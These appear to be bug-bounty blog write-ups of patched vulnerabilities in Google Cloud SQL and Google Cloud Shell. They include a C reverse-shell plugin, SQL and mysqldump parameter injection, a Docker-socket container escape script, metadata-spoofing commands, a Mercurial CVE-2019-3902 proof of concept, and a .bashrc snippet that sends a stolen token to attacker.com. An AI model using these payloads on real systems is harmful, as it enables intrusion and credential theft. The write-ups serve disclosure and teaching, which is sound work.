Author: wtm@offensi.com

How to contact Google SRE: Dropping a shell in cloud SQL

Note: The vulnerabilities that are discussed in this post were patched quickly and properly by Google. We support responsible disclosure. The research that resulted in this post was done by me and my bug-hunting friend Ezequiel Pereira. You can read this same post on his website.

About Cloud SQL

Google Cloud SQL is a fully managed relational database service. Customers can deploy a SQL Server, PostgreSQL or MySQL server which is secured, monitored and updated by Google. More demanding users can easily scale, replicate or configure high availability. By doing so, users can focus on working with the database instead of dealing with all the previously mentioned complex tasks. Cloud SQL databases are accessible through the applicable command-line utilities or from any application hosted around the world. This write-up covers vulnerabilities that we have discovered in the MySQL versions 5.6 and 5.7 of Cloud SQL.

Limitations of a managed MySQL instance

Because Cloud SQL is a fully managed service, users don’t have access to certain features, in particular the SUPER and FILE privileges. In MySQL, the SUPER privilege is reserved for system administration related tasks, and the FILE privilege for reading and writing files on the server running the MySQL daemon. Any attacker who gets hold of these privileges can easily compromise the server.

Furthermore, mysqld port 3306 is not reachable from the public internet by default due to firewalling. When a user connects to MySQL using the gcloud client (‘gcloud sql connect <instance>’), the user’s IP address is temporarily added to the whitelist of hosts that are allowed to connect.

Users do get access to the ‘root’@’%’ account. In MySQL, users are defined by a username AND a hostname; in this case the user ‘root’ can connect from any host (‘%’).

Elevating privileges

Bug 1. Obtaining FILE privileges through SQL injection

When looking at the web-interface of the MySQL instance in the Google Cloud console, we notice several features are presented to us. We can create a new database, new users and we can import and export databases from and to storage buckets. While looking at the export feature, we noticed we can enter a custom query when doing an export to a CSV file. 

Because we want to know how Cloud SQL is doing the CSV export, we intentionally enter the incorrect query “SELECT * FROM evil AND A TYPO HERE”. This query results in the following error: 

Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND A TYPO HERE INTO OUTFILE '/mysql/tmp/savedata-1589274544663130747.csv' CHARA' at line 1

The error clearly shows that the user that is connecting to MySQL to do the export has FILE privileges. It attempts to select data to temporarily store it into the ‘/mysql/tmp’ directory before exporting it to a storage bucket. When we run ‘SHOW VARIABLES’ from our MySQL client we notice that ‘/mysql/tmp’ is the secure_file_priv directory, meaning that ‘/mysql/tmp’ is the only path where a user with FILE privileges is allowed to store files. 
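For reference, the same check can be reproduced from any MySQL client; a minimal sketch (the reported value matches the path from the error above, the instance IP is a placeholder):

# confirm the only directory a FILE-privileged user is allowed to write to
mysql -h <instance-ip> -u root -p -e "SHOW VARIABLES LIKE 'secure_file_priv';"
# secure_file_priv | /mysql/tmp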

By adding the MySQL comment character (#) to the query we can perform SQL injection with FILE privileges: 

SELECT * FROM ourdatabase INTO OUTFILE '/mysql/tmp/evilfile' #

An attacker could now craft a malicious database and select the contents of a table but can only write the output to a file under ‘/mysql/tmp’. This does not sound very promising so far. 

Bug 2. Parameter injection in mysqldump

When doing a regular export of a database, we notice that the end result is a .sql file dumped by the ‘mysqldump’ tool. This is easily confirmed when you open an exported database from a storage bucket: the first lines of the dump reveal the tool and its version:

-- MySQL dump 10.13  Distrib 5.7.25, for Linux (x86_64)
--
-- Host: localhost    Database: mysql
-- ------------------------------------------------------
-- Server version	5.7.25-google-log

Now we know that when we run the export tool, the Cloud SQL API somehow invokes mysqldump and stores the database before moving it to a storage bucket. 

When we intercept the API call that is responsible for the export with Burp we see that the database (‘mysql’ in this case) is passed as a parameter: 
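The request in question is an export call to the Cloud SQL Admin API. A rough sketch of what it looks like when replayed with curl is shown below; the endpoint and field names follow the public v1beta4 API, while the project, instance and bucket names are placeholders:

# the "databases" value is the parameter that ends up on the server-side mysqldump command line
curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  -d '{"exportContext":{"fileType":"SQL","uri":"gs://<bucket>/dump.sql","databases":["mysql"]}}' \
  "https://sqladmin.googleapis.com/sql/v1beta4/projects/<project>/instances/<instance>/export"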

An attempt to modify the database name in the API call from ‘mysql’ to ‘--help’ results in something that surprised us: the mysqldump help is dumped into a .sql file in a storage bucket.

mysqldump  Ver 10.13 Distrib 5.7.25, for Linux (x86_64)
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.

…

Dumping structure and contents of MySQL databases and tables.
Usage: mysqldump [OPTIONS] database [tables]
OR     mysqldump [OPTIONS] --databases [OPTIONS] DB1 [DB2 DB3...]
OR     mysqldump [OPTIONS] --all-databases [OPTIONS]

...
--print-defaults        Print the program argument list and exit.
--no-defaults           Don't read default options from any option file,
                        except for login file.
--defaults-file=#       Only read default options from the given file #.

Testing for command injection resulted in failure, however. It seems that mysqldump is passed as the first argument to execve(), rendering a command injection attack impossible.

We can, however, pass arbitrary parameters to mysqldump, as the ‘--help’ output illustrates.

Crafting a malicious database

Among the many parameters mysqldump has to offer, most of them useless in this case, two stand out: ‘--plugin-dir’ and ‘--default-auth’.

The --plugin-dir parameter allows us to pass the directory where client-side plugins are stored. The --default-auth parameter specifies which authentication plugin we want to use. Remember that we could write to ‘/mysql/tmp’? What if we write a malicious plugin to ‘/mysql/tmp’ and load it with the aforementioned mysqldump parameters? We must, however, prepare the attack locally: we need a malicious database that we can import into Cloud SQL before we can export any useful content into ‘/mysql/tmp’. We prepare this on a MySQL server running on our own desktop computers.

First we write a malicious shared object which spawns a reverse shell to a specified IP address. We overwrite the _init function:

#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/ip.h>

/* _init() runs automatically when the shared object is loaded as a client plugin. */
void _init() {
  int fd;
  int port = 1234;                       /* attacker listener port */

  struct sockaddr_in addr;
  char * callback = "123.123.123.123";   /* attacker listener IP */
  char mesg[] = "Shell on speckles>\n";
  char shell[] = "/bin/sh";

  /* connect back to the listener */
  addr.sin_family = AF_INET;
  addr.sin_port = htons(port);
  addr.sin_addr.s_addr = inet_addr(callback);
  fd = socket(AF_INET, SOCK_STREAM, 0);
  connect(fd, (struct sockaddr*)&addr, sizeof(addr));

  send(fd, mesg, sizeof(mesg), 0);

  /* attach stdin/stdout/stderr to the socket and spawn a shell */
  dup2(fd, 0);
  dup2(fd, 1);
  dup2(fd, 2);
  execl(shell, "sshd", (char *)NULL);
  close(fd);
}

We compile it into a shared object with the following command: 

gcc -fPIC -shared -o evil_plugin.so evil_plugin.c -nostartfiles

On our locally running database server, we now insert the evil_plugin.so file into a longblob table: 

mysql -h localhost -u root

> CREATE DATABASE files;
> USE files;
> CREATE TABLE `data` (
    `exe` longblob
  ) ENGINE=MyISAM DEFAULT CHARSET=binary;
> INSERT INTO data VALUES(LOAD_FILE('evil_plugin.so'));

Our malicious database is now done! We export it to a .sql file with mysqldump: 

mysqldump -h localhost -u root files > files.sql

Next we store files.sql in a storage bucket. After that, we create a database called ‘files’ in Cloud SQL and import the malicious database dump into it. 
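One way to perform these last steps with the gcloud CLI is sketched below; the bucket and instance names are placeholders:

# upload the dump, create the target database and import the dump into it
gsutil cp files.sql gs://<bucket>/files.sql
gcloud sql databases create files --instance=<instance>
gcloud sql import sql <instance> gs://<bucket>/files.sql --database=files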

Dropping a Shell

With everything prepared, all that’s left now is writing evil_plugin.so to /mysql/tmp before triggering the reverse shell by injecting ‘--plugin-dir=/mysql/tmp/ --default-auth=evil_plugin’ as parameters to the mysqldump that runs server-side.

To accomplish this, we once again run the CSV export feature, this time against the ‘files’ database, while passing the following data as its query argument:

SELECT * FROM data INTO DUMPFILE '/mysql/tmp/evil_plugin.so' #

Now we run a regular export against the MySQL database again, and modify the request to the API with Burp to pass the correct parameters to mysqldump: 
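Before replaying the modified request, a netcat listener has to be waiting on the address and port that were compiled into evil_plugin.so; a minimal sketch:

# catch the reverse shell spawned by the injected client-side plugin
nc -lvp 1234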

Success! On our listening netcat we are now dropped into a reverse shell.

Fun fact

Not long after we started exploring the environment we had landed our shell in, we noticed a new file in the /mysql/tmp directory named ‘greetings.txt’:

Google SRE (Site Reliability Engineering) appeared to be on to us 🙂 During our attempts we had crashed a few of our own instances, which alerted them. We got in touch with SRE via e-mail, informed them about our little adventure, and they kindly replied.

Our journey did not end here, however, since it appeared that we were trapped inside a Docker container, running nothing more than the bare minimum needed to export our database. We needed to find a way to escape, and quickly: SRE knew what we were doing, and Google might already be working on a patch.

Escaping to the host

The container that we had access to was running unprivileged, meaning that no easy escape was available. Upon inspecting the network configuration, we noticed that we had access to eth0, which in this case had the internal IP address of the container attached to it.

This was because the container was configured with the Docker host networking driver (--network=host). When you run a Docker container without any special privileges, its network stack is isolated from the host; in host network mode that is no longer the case. The container no longer gets its own IP address, but instead binds all services directly to the host’s IP. Furthermore, we could intercept ALL network traffic that the host sends and receives on eth0 (tcpdump -i eth0).

The Google Guest Agent (/usr/bin/google_guest_agent)

When you inspect network traffic on a regular Google Compute Engine instance you will see a lot of plain HTTP requests being directed to the metadata instance on 169.254.169.254. One service that makes such requests is the Google Guest Agent. It runs by default on any GCE instance that you configure. An example of the requests it makes can be found below.

The Google Guest Agent monitors the metadata for changes. One of the properties it looks for is the SSH public keys. When a new public SSH key is found in the metadata, the guest agent writes this public key to the user’s .authorized_keys file, creating a new user if necessary and adding it to sudoers.

The way the Google Guest Agent monitors for changes is through a call to retrieve all metadata values recursively (GET /computeMetadata/v1/?recursive=true), indicating to the metadata server to only send a response when there is any change with respect to the last retrieved metadata values, identified by its Etag (wait_for_change=true&last_etag=<ETAG>).

This request also includes a timeout (timeout_sec=<TIME>), so if a change does not occur within the specified amount of time, the metadata server responds with the unchanged values.
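The same long-polling request can be reproduced by hand; a sketch with curl (the ETag value is a placeholder):

# hanging GET issued by the guest agent; the metadata server replies once
# something changes, or after timeout_sec with the unchanged values
curl -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=json&wait_for_change=true&timeout_sec=60&last_etag=<ETAG>"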

Executing the attack

Taking into consideration the access to the host network, and the behavior of the Google Guest Agent, we decided that spoofing the Metadata server SSH keys response would be the easiest way to escape our container.

Since ARP spoofing does not work on Google Compute Engine networks, we used our own modified version of rshijack (diff) to send our spoofed response.

This modified version of rshijack allowed us to pass the ACK and SEQ numbers as command-line arguments, saving time and allowing us to spoof a response before the real Metadata response came.

We also wrote a small shell script that returns a specially crafted payload that triggers the Google Guest Agent to create the user “wouter”, with our own public key in its authorized_keys file.

This script receives the ETag as a parameter, since by keeping the same ETag, the Metadata server wouldn’t immediately tell the Google Guest Agent that the metadata values were different on the next response, instead waiting the specified amount of seconds in timeout_sec.
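The original script is not reproduced here, but a minimal sketch of the idea looks roughly like this; the JSON shape, the username and the key material are illustrative assumptions, not the exact payload:

#!/bin/sh
# fakeData.sh <ETAG> - print a raw spoofed HTTP response for rshijack to inject.
# Re-using the caller-supplied ETag keeps the guest agent from immediately
# seeing another "change" on its next poll.
ETAG="$1"
# assumed shape: recursive metadata JSON carrying an ssh-keys attribute
BODY='{"project":{"attributes":{"ssh-keys":"wouter:ssh-rsa AAAA...placeholder... wouter"}}}'
printf 'HTTP/1.1 200 OK\r\n'
printf 'Metadata-Flavor: Google\r\n'
printf 'Content-Type: application/json\r\n'
printf 'ETag: %s\r\n' "$ETAG"
printf 'Content-Length: %s\r\n' "${#BODY}"
printf '\r\n%s' "$BODY"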

To achieve the spoofing, we watched requests to the Metadata server with tcpdump (tcpdump -S -i eth0 'host 169.254.169.254 and port 80' &), waiting for a line that looked like this:

<TIME> IP <LOCAL_IP>.<PORT> > 169.254.169.254.80: Flags [P.], seq <NUM>:<TARGET_ACK>, ack <TARGET_SEQ>, win <NUM>, length <NUM>: HTTP: GET /computeMetadata/v1/?timeout_sec=<SECONDS>&last_etag=<ETAG>&alt=json&recursive=True&wait_for_change=True HTTP/1.1

As soon as we saw that value, we quickly ran rshijack with our fake Metadata response payload and SSH’d into the host:

fakeData.sh <ETAG> | rshijack -q eth0 169.254.169.254:80 <LOCAL_IP>:<PORT> <TARGET_SEQ> <TARGET_ACK>; ssh -i id_rsa -o StrictHostKeyChecking=no wouter@localhost

Most of the time, we were able to type fast enough to get a successful SSH login :).

Once we accomplished that, we had full access to the host VM and were able to execute commands as root through sudo.

Impact & Conclusions

Once we escaped to the host VM, we were able to fully research the Cloud SQL instance.

It wasn’t as exciting as we expected, since the host did not have much beyond the absolutely necessary stuff to properly execute MySQL and communicate with the Cloud SQL API.

One of our more interesting findings concerned the iptables rules: when you enable Private IP access (which cannot be disabled afterwards), access to the MySQL port is not only opened for the IP addresses of the specified VPC network, but for the full 10.0.0.0/8 range, which includes other Cloud SQL instances.

Therefore, if a customer ever enabled Private IP access to their instance, they could be targeted by an attacker-controlled Cloud SQL instance. This could go wrong very quickly if the customer solely relied on the instance being isolated from the external world, and didn’t protect it with a proper password.

Furthermore, the Google VRP team expressed concern, since it might be possible to escalate IAM privileges using the Cloud SQL service account attached to the underlying Compute Engine instance.

4 Google Cloud Shell bugs explained – bug #1


Note: The vulnerabilities that are discussed in this series of posts and in LiveOverflow‘s video were patched quickly and properly by Google (a long time ago). We support responsible disclosure.

Bug #1 – The Python Language Server

Introduction

Google Cloud Shell provides users with a feature called “Open In Cloud Shell”. By using this feature, users can create a link that automatically opens Cloud Shell and clones a Git repository hosted on either Github or Bitbucket. This is done by passing the ‘cloudshell_git_repo’ parameter to the Cloud Shell URL, as can be seen in the code below:

<a href="https://ssh.cloud.google.com/cloudshell/editor?cloudshell_git_repo=http://path-to-repo/sample.git"><img alt="Open in Cloud Shell" src ="https://gstatic.com/cloudssh/images/open-btn.svg"></a>

Upon opening the link, Cloud Shell is launched and the ‘http://path-to-repo/sample.git’ repo is cloned inside the user’s home directory.

Multiple parameters can be passed besides the ‘cloudshell_git_repo’ GET-parameter. When combining ‘cloudshell_git_repo’ with the ‘open_in_editor’ parameter, we can clone a repository and launch the Theia IDE on a specified file all at once. A full overview of all supported GET-parameters can be found in the Cloud Shell documentation.

PYLS

When a user clones a Git repository containing ‘some_python_file.py’ and passes this file to the open_in_editor GET-parameter (‘open_in_editor=some_python_file.py’), the Theia editor opens the specified file. In the editor we can clearly see that the IDE suddenly gained syntax highlighting and autocompletion capabilities:

When inspecting the running processes with ‘ps’, we notice a new process: the editor_exec.sh script fired up the pyls Python language server.

wtm          736  0.0  0.1  11212  2920 ?        S<s  13:54   0:00 /bin/bash /google/devshell/editor/editor_exec.sh python -m pyls

The parent process appears to be sshd. If we attach strace to the sshd process and watch the Python language server being fired up, we can inspect all the system calls being executed. We save the output to ‘/tmp/out’ for later inspection.

While going through all the syscalls in ‘/tmp/out’, I noticed the Python language server trying to query non-existent packages in my home directory with the stat() syscall.

538   stat("/home/wtm/supervisor", 0x7ffdf08e11e0) = -1 ENOENT (No such file or directory)
542   stat("/home/wtm/pyls", 0x7ffcbbf61a10) = -1 ENOENT (No such file or directory)
542   stat("/home/wtm/google", 0x7ffcbbf5fe00) = -1 ENOENT (No such file or directory)

When Python imports a package, it looks for an ‘__init__.py’ file and executes it (namespace packages without an ‘__init__.py’ only arrived in Python 3.3; see PEP 420). We now have our attack vector!

Constructing the exploit

If we create an evil Python Git repository named ‘supervisor’, ‘pyls’ or ‘google’ containing a malicious ‘__init__.py’, we can trick the Python language server into executing arbitrary code. All we have to do is store the evil repository on GitHub and point our victim to https://ssh.cloud.google.com/console/editor?cloudshell_git_repo=https://github.com/offensi/supervisor&open_in_editor=__init__.py. By passing ‘__init__.py’ to the ‘open_in_editor’ GET-parameter, we force the IDE into automatically launching the Python language server.
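A minimal sketch of how such a repository could be put together locally is shown below; the payload and the callback URL are placeholders:

# build a git repo whose __init__.py runs as soon as pyls imports the package
mkdir supervisor && cd supervisor
git init -q
cat > __init__.py <<'EOF'
import os
# placeholder payload: call back to an attacker-controlled host
os.system("curl -s https://attacker.example/$(whoami)")
EOF
git add __init__.py && git commit -qm "initial commit"
# push to GitHub, then send the victim the crafted Cloud Shell URL shown above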

That same language server now starts looking for a package named ‘supervisor’, which of course can now be found, since we have just cloned the repository with that name. The malicious code hidden inside ‘__init__.py’ is then executed, meaning our victim’s GCP resources are compromised.

Continue reading: Bug #2 – A custom Cloud Shell image

4 Google Cloud Shell bugs explained – bug #2


Note: The vulnerabilities that are discussed in this series of posts and in LiveOverflow‘s video were patched quickly and properly by Google (a long time ago). We support responsible disclosure.

Bug #2 – A custom Cloud Shell image

Introduction

The Cloud Shell presented to you by default is based on a Debian 9 Stretch Docker image. This image contains the most popular tools and is stored in Google’s Container Registry at gcr.io/cloudshell-images/cloudshell:latest.

Users with special needs can replace the Debian Cloud Shell image and launch a custom image instead. For example, if you wish to use a Terraform image for infrastructure provisioning, you can replace the Debian image with the Terraform image under the Cloud Shell Environment settings.

Another way to automatically boot a custom Docker image is by providing the ‘cloudshell_image’ GET-parameter, as such: https://ssh.cloud.google.com/cloudshell/editor?cloudshell_image=gcr.io/google/ruby

The trusted environment

Google makes a distinction between the default image and custom images. A container running the default image comes with your home folder mounted at /home/username. Furthermore, upon boot it provisions your gcloud client with credentials.

Launching a custom image from an untrusted third party might introduce a security risk. What if a custom image contains malicious code and tries to access your GCP resources?

Google therefore introduced a ‘trusted’ and an ‘untrusted’ mode. The only image that automatically runs in trusted mode is ‘gcr.io/cloudshell-images/cloudshell:latest’. When booting a custom image in untrusted mode, the container is provisioned with a scratch home directory mounted at /home/user, which is empty and deleted when the session ends. Furthermore, there are no credentials attached to the gcloud client and you cannot query the metadata instance at metadata.google.internal to obtain a bearer token.

Escaping the untrusted environment

In the general introduction of this series of posts we already learned how to escape from the default Cloud Shell to the host. We paste the same lines of code again.

sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name LiveOverflow-container -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start LiveOverflow-container
sudo docker -H unix:///google/host/var/run/docker.sock exec -it LiveOverflow-container /bin/sh

At this point we have a shell on the host. We change the root by chrooting into /rootfs (‘chroot /rootfs’). After searching the filesystem, it became apparent that the host instance was in a different state than expected: while the container hosting the custom Docker image had an empty /home/user folder attached to it, the ‘dmesg’ and ‘mount’ commands clearly show that the persistent disk containing the user’s home folder is still attached to the underlying instance!
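A quick way to confirm this from the privileged helper container looks roughly like this (sketch):

chroot /rootfs /bin/bash        # pivot into the host's root filesystem
# then, inside the chroot:
mount | grep -i home            # the user's persistent home disk shows up here
dmesg | tail -n 50              # along with its attach messages in the kernel log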

Exploiting it

With the above knowledge, any attacker can build a malicious Docker image that uses the same technique displayed above to escape to the host instance when booted. After escaping to the host, the malicious image can steal contents from the user’s home folder.

Furthermore, an attacker can write arbitrary contents to the user’s home folder in an attempt to steal credentials, for example by adding the following code to ‘/var/google/devshell-home/.bashrc’:

curl -H"Metadata-flavor: Google" http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token > /tmp/token.json
curl -X POST -d@/tmp/token.json https://attacker.com/api/tokenupload

Continue reading: Bug #3 – Git clone

4 Google Cloud Shell bugs explained – bug #3


Note: The vulnerabilities that are discussed in this series of posts and in LiveOverflow‘s video were patched quickly and properly by Google (a long time ago). We support responsible disclosure.

Bug #3 – Git clone

Introduction

In bug #1 of this series of articles we discussed appending the ‘cloudshell_git_repo’ GET-parameter to the Cloud Shell URL in order to clone a GitHub or Bitbucket repository. Aside from this parameter, we can also specify a ‘cloudshell_git_branch’ and a ‘cloudshell_working_dir’ parameter to aid in the cloning process.

How does this work? When we pass the three parameters listed above to the Cloud Shell URL, the cloudshell_open bash function is called inside your terminal window. This function is defined in ‘/google/devshell/bashrc.google.d/cloudshell_open.sh’. I have listed the most important lines of code below.

function cloudshell_open {
... 
git clone -- "$cloudshell_git_repo" "$target_directory"
cd "$cloudshell_working_dir"
git checkout "$cloudshell_git_branch"
...
}

We see that ‘git clone’ is executed against the URL specified in the cloudshell_git_repo GET-parameter. The script then changes the working directory by cd-ing into the directory specified in cloudshell_working_dir, and finally calls ‘git checkout’ on the specified git branch. Considering that all input parameters are properly filtered, this might seem harmless at first.

Git-hooks

Git hooks are custom scripts that fire when certain important actions are executed. The hooks that are created by default when you run ‘git init’ are stored in .git/hooks and look similar to this:
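For reference, a freshly initialised repository ships with a set of sample hooks (the exact list varies per Git version):

git init -q demo && ls demo/.git/hooks
# applypatch-msg.sample  pre-applypatch.sample      pre-push.sample
# commit-msg.sample      pre-commit.sample          pre-rebase.sample
# post-update.sample     prepare-commit-msg.sample  update.sample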

Wouldn’t it be cool if we could store these custom scripts inside an evil repository and have them executed when a victim’s Cloud Shell executes ‘git checkout’? According to the Git manual that’s not possible: these are client-side hooks, and anything hidden inside .git/ is ignored and thus not copied to the remote repo.

Bare repositories

The standard way of creating a repository is with ‘git init’. This creates a working repository with the well-known layout: it contains a .git/ directory where all revision history and metadata are stored, alongside the checked-out version of the files you are working on.

There is, however, another format in which a repository can be stored: a bare repository. This type of repository is normally used for sharing and has a flat layout. It can be created by running the ‘git init --bare’ command.
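A quick way to see the difference in layout (sketch); the bare format has no working tree and no .git/ directory, so its metadata, including hooks/, sits at the top level:

git init -q --bare bare-repo && ls bare-repo
# HEAD  branches  config  description  hooks  info  objects  refs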

The exploit

In the screenshot you can clearly see that we have just created a git repo without a ‘.git’ directory but WITH a ‘hooks’ directory! This means we can push the hooks stored in this bare repository to a remote repo, as long as we hide them in a subdirectory of a ‘normal’ repository. Remember the ‘cd’ command in the cloudshell_open function? We can jump into any subdirectory we want and execute ‘git checkout’, after which any hooks present get fired.

I published a proof of concept for this bug at https://github.com/offensi/git-poc. Running a git clone and a checkout on this repository as specified in the README will execute a harmless post-checkout hook.

An evil URL to target a Cloud Shell victim would look like this: https://ssh.cloud.google.com/console/editor?cloudshell_git_repo=https://github.com/offensi/git-poc&cloudshell_git_branch=master&cloudshell_working_dir=evilgitdirectory. Successful exploitation can be seen in the screenshot below.

Continue reading: Bug #4 – Go get pwned

4 Google Cloud Shell bugs explained – bug #4


Note: The vulnerabilities that are discussed in this series of posts and in LiveOverflow‘s video were patched quickly and properly by Google (a long time ago). We support responsible disclosure.

Bug #4 – Go and get pwned

Introduction

While auditing the JavaScript code that is responsible for all the client-side work in your browser when working with Cloud Shell, I noticed something out of the ordinary.

The code that handles all GET-parameters listed a parameter that is not present in the official documentation.

   var B3b = {
        CREATE_CUSTOM_IMAGE: "cloudshell_create_custom_image",
        DIR: "cloudshell_working_dir",
        GIT_BRANCH: "cloudshell_git_branch",
        GIT_REPO: "cloudshell_git_repo",
        GO_GET_REPO: "cloudshell_go_get_repo",
        IMAGE: "cloudshell_image",
        OPEN_IN_EDITOR: "cloudshell_open_in_editor",
        PRINT: "cloudshell_print",
        TUTORIAL: "cloudshell_tutorial"
    };

All of the parameters above are explained in the documentation, except for the ‘cloudshell_go_get_repo’ GET-parameter. When constructing a Cloud Shell URL with this parameter (https://ssh.cloud.google.com/cloudshell/editor?cloudshell_go_get_repo=https://github.com/some/package), the cloudshell_open function is again invoked.

The code responsible for handling the ‘go get’ command can be seen below.

function cloudshell_open {
...
valid_url_chars="[a-zA-Z0-9/\._:\-]*"
...
 if [[ -n "$cloudshell_go_get_repo" ]]; then
    valid_go_get=$(echo $cloudshell_go_get_repo | grep -e "^$valid_url_chars$")
    if [[ -z "$valid_go_get" ]]; then
      echo "Invalid go_get"
      return
    fi
...
go get -- "$cloudshell_go_get_repo"
go_src="$(go env GOPATH | cut -d ':' -f 1)/src/$go_get"

All input seemed to be filtered properly. Nevertheless, I kept some notes about this finding.

Container Vulnerability scanning

A few months later I was hunting for bugs in Google’s Container Registry (gcr.io). One of the features it provides is called Vulnerability Scanning. When you enable Vulnerability Scanning, every Docker image you push to the registry is scanned for known vulnerabilities and exposures. As new vulnerabilities are discovered, the Container Registry checks whether they affect images in your registry.

One of the Docker images I had been working with before was, of course, the Cloud Shell image available at gcr.io/cloudshell-images/cloudshell:latest. I had this image readily available on my local Docker engine, so I pushed it to the registry in order to inspect the workings of the Vulnerability Scanning feature.

Upon opening the results of the scan against the Cloud Shell image, I was a bit surprised: the image seemed to be packed with over 500 vulnerabilities.

After checking almost every vulnerability that was listed, I finally found one that looked interesting and useful to me: CVE-2019-3902.

Exploiting CVE-2019-3902

CVE-2019-3902 describes a vulnerability in Mercurial. Due to a flaw in the path-checking logic of the Mercurial/hg client, a malicious repository can write files outside of the repository boundaries on the client’s filesystem. I knew that the ‘go get’ command is capable of handling several types of repositories: svn, bzr, git and hg!

Since no public exploit for CVE-2019-3902 was available, I had to try to reconstruct it. I downloaded two versions of the Mercurial source code, the patched and the unpatched one, hoping that comparing the two would provide me with some clues on how to exploit it.

When examining the patched Mercurial source code, I stumbled across automated test cases stored in the /tests/ directory. Based on these tests I was able to reconstruct the exploit.

#!/bin/sh
# PoC for Google VRP by wtm@offensi.com
# Build a malicious Mercurial repository abusing CVE-2019-3902: a symlink plus
# a subrepository lets the clone write files outside the repository root.
mkdir hgrepo
hg init hgrepo/root
cd hgrepo/root
ln -s ../../../bin                 # symlink pointing outside the repository
hg ci -qAm 'add symlink "bin"'
hg init ../../../bin               # subrepo that resolves through the symlink
echo 'bin = bin' >> .hgsub
hg ci -qAm 'add subrepo "bin"'

# place a fake 'cut' executable in the escaped ../../../bin directory
cd ../../../bin
echo '#!/bin/sh' >> cut
echo 'wall You have been pwned!' >> cut
chmod +x cut
hg add cut
hg commit -m "evil cut bin"

cd /var/www/html/hgrepo/root
hg commit -m "final"

The code above constructs a malicious repository. When this repository is cloned by a vulnerable hg client, a malicious file named ‘cut’ is written to ../../../bin. When we looked at the cloudshell_open function earlier, we saw that the ‘cut’ command is called right after ‘go get’ clones our malicious repository, and thus our arbitrary code is executed.

The malicious repo was stored on a personal webserver under go.offensi.com/hgrepo. A malicious go.html file was placed in the root of the webserver to instruct the ‘go get’ command to clone a Mercurial repository.

<meta name="go-import" content="go.offensi.com/go.html hg https://go.offensi.com/hgrepo/root">

Now any Cloud Shell user can be tricked into arbitrary code execution by opening this link: https://ssh.cloud.google.com/cloudshell/editor?cloudshell_go_get_repo=https://go.offensi.com/go.html

4 Google Cloud Shell bugs explained

Quick navigation

  • Introduction (this page)
  • Bug #1 – The Python language server
  • Bug #2 – A custom Cloud Shell image
  • Bug #3 – Git clone
  • Bug #4 – Go and get pwned



Note: The vulnerabilities that are discussed in this series of posts and in LiveOverflow‘s video were patched quickly and properly by Google (a long time ago). We support responsible disclosure.

Introduction

In 2019 I spent a significant amount of my time hunting for bugs in the Google Cloud Platform. While the Google Cloud Platform is known to be a tough target among bug hunters, I was lucky enough to have some modest success in finding bugs in one of its services, the Google Cloud Shell.

In July I was therefore approached by Eduardo of the Google VRP. He asked me if I was willing to demonstrate a Cloud Shell bug to LiveOverflow as part of an interview for a video, on one precondition: the bug had to be unfixed by Google! LiveOverflow did a great job in polishing up my bug, the result of which can be seen here.

Later on, Google invited me to attend the BugSWAT event in October at Google’s HQ in London. At this event I was able to share some of my findings with my fellow bug hunters and Googlers by giving a talk titled “4 Cloudshell bugs in 25 minutes”.

In total I discovered 9 vulnerabilities in Google Cloud Shell. In this series of posts I will uncover and explain 4 of them, ending with my favorite one.

About Google Cloud Shell

Google Cloud Shell provides administrators and developers with a quick way to access cloud resources. It offers users a Linux shell that is accessible via the browser. This shell comes with the pre-installed tools needed to start working on your Google Cloud Platform project, such as gcloud, Docker, Python, vim, Emacs and Theia, a powerful open-source IDE.

Users of the Google Cloud Platform can launch a Cloud Shell instance via the Cloud Console or simply by visiting this url: https://console.cloud.google.com/home/dashboard?cloudshell=true&project=your_project_id

When the Cloud Shell instance is done starting, a terminal window is presented to the user. In the screenshot below you can see what that looks like. Noteworthy is the fact that the gcloud client is already authenticated. If an attacker is able to compromise your Cloud Shell, they can access all of your GCP resources.

Escaping the Cloud Shell container

When inspecting the running processes with ‘ps’ inside the Cloud Shell, it looks like we might be trapped inside a Docker container: only a small number of processes is running.

To confirm our suspicion we can inspect the /proc filesystem. Docker Engine for Linux makes use of so-called control groups (cgroups). A cgroup limits an application to a specific set of resources; for example, by using cgroups Docker can limit the amount of memory that is allocated to a container. In the case of Cloud Shell, I identified the use of Kubernetes and Docker by inspecting the contents of /proc/1/environ, as can be seen in the screenshot below.
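The check itself is a one-liner (sketch; the grep pattern is just an illustration):

# PID 1's environment is NUL-separated; Kubernetes service variables give it away
tr '\0' '\n' < /proc/1/environ | grep -iE 'kube|docker'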

At this point I knew for sure I was trapped inside a container. If I wanted to learn more about the inner workings of Cloud Shell, I needed to find a way to escape to the host. Luckily, after exploring the filesystem, I noticed that there were two Docker Unix sockets available: one at ‘/run/docker.sock‘, which is the default path for the Docker client running inside the Cloud Shell (Docker inside Docker), and a second one at ‘/google/host/var/run/docker.sock‘.

The pathname of the second Unix socket reveals that this is the host-based Docker socket. Anyone who can communicate with a host-based Docker socket can easily escape the container and gain root access on the host at the same time.

Using the script below, I escaped to the host.

# create a privileged container with host root filesystem mounted - wtm@offensi.com
sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name LiveOverflow-container -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start LiveOverflow-container
sudo docker -H unix:///google/host/var/run/docker.sock exec -it LiveOverflow-container /bin/sh

The bigger picture

Now that I had root access on the host, I started exploring the Kubernetes configuration, which is stored under ‘/etc/kubernetes/manifests/‘ in YAML files. Based on the Kubernetes configuration and several hours of inspecting traffic with tcpdump, I now had a better overview of how Cloud Shell works. I created a quick and dirty high-level diagram to keep an overview.

Reconfigure Kubernetes

